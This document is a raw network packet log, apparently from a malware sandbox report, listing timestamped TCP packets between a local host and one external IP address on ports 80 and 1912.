                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.336270094 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.336361885 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.336481094 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.339376926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.339448929 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.339488029 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.342653036 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.342715979 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.342793941 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.346018076 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.346103907 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.346148014 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.349136114 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.349217892 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.349257946 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.352452993 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.352535963 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.352659941 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.355952978 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.356012106 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.356103897 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.358700991 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.358807087 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.358861923 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.362250090 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.362376928 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.362538099 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.365220070 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.365302086 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.365377903 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.368940115 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.368977070 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.369106054 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.371582031 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.371699095 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.371913910 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.374800920 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.374972105 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.375091076 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.377984047 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.378038883 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.378077030 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.381210089 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.381345034 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.381438971 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.384418964 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.384556055 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.384675026 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.387619019 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.387749910 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.387867928 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.390839100 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.390937090 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.391016006 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.394057035 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.394166946 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.394260883 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.397342920 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.397396088 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.397574902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.400495052 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.402842999 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.451239109 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.451394081 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.451483965 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.452429056 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.452577114 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.452680111 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.455049038 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.455914021 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.455950022 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.456029892 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.458420992 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.458509922 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.458555937 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.460968971 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.461024046 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.461066008 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.463372946 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.463502884 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.463623047 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.466032028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.466264009 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.466317892 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.468219042 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.468310118 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.468358994 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.470783949 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.470881939 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.471012115 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.472820997 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.472903013 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.472934961 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.475070000 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.475224972 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.475255966 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.477312088 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.477365971 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.477374077 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.478853941 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.478935957 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.478976965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.481036901 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.481142044 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.481268883 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.483127117 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.483231068 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.483326912 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.485429049 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.485543013 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.485590935 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.489531994 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.489739895 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.489789963 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.493437052 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.493550062 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.493558884 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.495170116 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.495253086 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.495338917 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.496793032 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.496871948 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.496880054 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.498936892 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.499013901 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.499083042 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.500750065 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.500809908 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.500849962 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.502424955 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.502538919 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.502654076 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.503922939 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.504003048 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.504009962 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.505687952 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.505799055 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.505867004 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.507411957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.507483959 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.507508993 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.509624958 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.509691954 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.509856939 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.511996031 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.512108088 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.512120962 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.512207031 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.512207985 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.631995916 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.680641890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.800412893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.800825119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.800906897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.920674086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133486986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133511066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133642912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133677006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133738995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133750916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133863926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133930922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133941889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133953094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133964062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133989096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.133989096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.134186029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.254342079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.254426956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.254693985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.258095980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.258128881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.258361101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.323189020 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.326141119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.326206923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.326360941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.330365896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.330429077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.330738068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.338726044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.338833094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.339263916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.347379923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.347486019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.347611904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.355597019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.355719090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.355874062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.363946915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.364082098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.364279032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.372400045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.372472048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.372764111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.380799055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.380893946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.381004095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.389276028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.389368057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.389926910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.397578001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.398324966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.398525000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.405087948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.405215979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.405508995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.412341118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.412525892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.412746906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.443124056 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.443222046 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.452737093 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.519253016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.519366026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.519504070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.521177053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.521225929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.521487951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.525871038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.525904894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.526030064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.530330896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.530546904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.530670881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.535108089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.535202026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.535334110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.539834023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.539938927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.540129900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.544408083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.544544935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.544667006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.548994064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.549073935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.549213886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.553457975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.553618908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.554136038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.558015108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.558119059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.558552027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.562589884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.562735081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.562892914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.568217993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.568275928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.569119930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.572062016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.572120905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.572386026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.572643042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.576010942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.576087952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.576232910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.580522060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.580643892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.580913067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.585006952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.585170984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.585299969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.589579105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.589695930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.592627048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.594434023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.594549894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.594733953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.598529100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.598613977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.598795891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.710788965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.711035967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.711173058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.712718964 CET8049709185.81.68.147192.168.2.8
